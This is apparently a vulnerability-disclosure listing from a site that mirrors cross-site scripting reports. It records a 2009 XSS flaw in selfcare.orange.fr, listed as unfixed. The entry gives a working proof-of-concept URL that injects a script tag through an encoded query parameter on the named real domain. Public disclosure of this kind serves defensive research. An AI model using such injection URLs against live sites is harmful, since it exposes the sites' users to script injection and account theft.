Security researcher Mystick, has submitted on 24/10/2009 a cross-site-scripting (XSS) vulnerability affecting selfcare.orange.fr, which at the time of submission ranked 180 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 21/05/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 24/10/2009 |
Date published: 21/05/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: Mystick |
Domain: selfcare.orange.fr |
Category: XSS |
Pagerank: 180 |
URL: http://selfcare.orange.fr/signup/bin/signup.cgi?service=&url=http%3A%2F%2Fmobile.orange.fr%2F0%2Facc ueil%2FPA%3FPORTLETSERVICE%3D%22%3E%3Cscript%3Ealert%28%2FXSS%2F.source%29%3C%2Fscript%3E |
Click here to view the mirror
|
|
|